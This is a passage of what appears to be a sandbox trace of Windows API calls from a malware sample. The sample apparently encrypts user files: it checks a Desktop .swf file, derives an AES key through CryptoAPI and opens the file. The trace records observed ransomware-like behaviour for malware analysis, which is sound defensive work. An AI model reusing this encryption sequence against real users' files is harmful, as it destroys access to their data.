wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.607] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0030.607] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0030.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0030.607] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.607] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.607] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.607] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb93c3970, ftCreationTime.dwHighDateTime=0x1d5c366, ftLastAccessTime.dwLowDateTime=0xe2c02960, ftLastAccessTime.dwHighDateTime=0x1d5beb5, ftLastWriteTime.dwLowDateTime=0xe2c02960, ftLastWriteTime.dwHighDateTime=0x1d5beb5, nFileSizeHigh=0x0, nFileSizeLow=0x4857, dwReserved0=0x0, dwReserved1=0x777648, cFileName="AtELWG4 7FDtQ.swf", cAlternateFileName="ATELWG~1.SWF")) returned 0x7c20c0 [0030.607] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0030.607] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.607] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb93c3970, ftCreationTime.dwHighDateTime=0x1d5c366, ftLastAccessTime.dwLowDateTime=0xe2c02960, ftLastAccessTime.dwHighDateTime=0x1d5beb5, ftLastWriteTime.dwLowDateTime=0xe2c02960, ftLastWriteTime.dwHighDateTime=0x1d5beb5, nFileSizeHigh=0x0, nFileSizeLow=0x4857, dwReserved0=0x0, dwReserved1=0x777648, cFileName="AtELWG4 7FDtQ.swf", cAlternateFileName="ATELWG~1.SWF")) returned 0x7c20c0 [0030.608] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0030.608] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="33uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Xhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vtf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tf\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ClVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lVeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VeU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eU\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AtELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LWG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WG4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.610] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="G4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.610] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.610] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" 7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.610] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.610] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FDtQ.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.610] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.610] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0030.610] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0030.610] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.610] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.610] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.610] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.610] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0030.610] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.610] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.610] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.610] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.610] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb93c3970, ftCreationTime.dwHighDateTime=0x1d5c366, ftLastAccessTime.dwLowDateTime=0xe2c02960, ftLastAccessTime.dwHighDateTime=0x1d5beb5, ftLastWriteTime.dwLowDateTime=0xe2c02960, ftLastWriteTime.dwHighDateTime=0x1d5beb5, nFileSizeHigh=0x0, nFileSizeLow=0x4857, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="AtELWG4 7FDtQ.swf", cAlternateFileName="ATELWG~1.SWF")) returned 0x7c2240 [0030.610] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0030.610] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0030.610] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.611] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0030.611] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0030.611] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.611] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.611] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0030.612] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0030.612] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0030.612] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0030.612] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0030.612] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.612] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0030.612] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.612] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0030.612] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.612] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0030.614] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0030.614] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.614] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.614] CryptHashData (hHash=0x7c2100, pbData=0x7c75d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0030.614] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.614] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0030.614] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.614] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0030.614] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.615] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.615] CryptDestroyHash (hHash=0x7c2100) returned 1 [0030.615] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\clveu\\atelwg4 7fdtq.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0030.615] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.615] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0030.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0030.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0030.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0030.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0030.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0030.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0030.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0030.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0030.615] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, 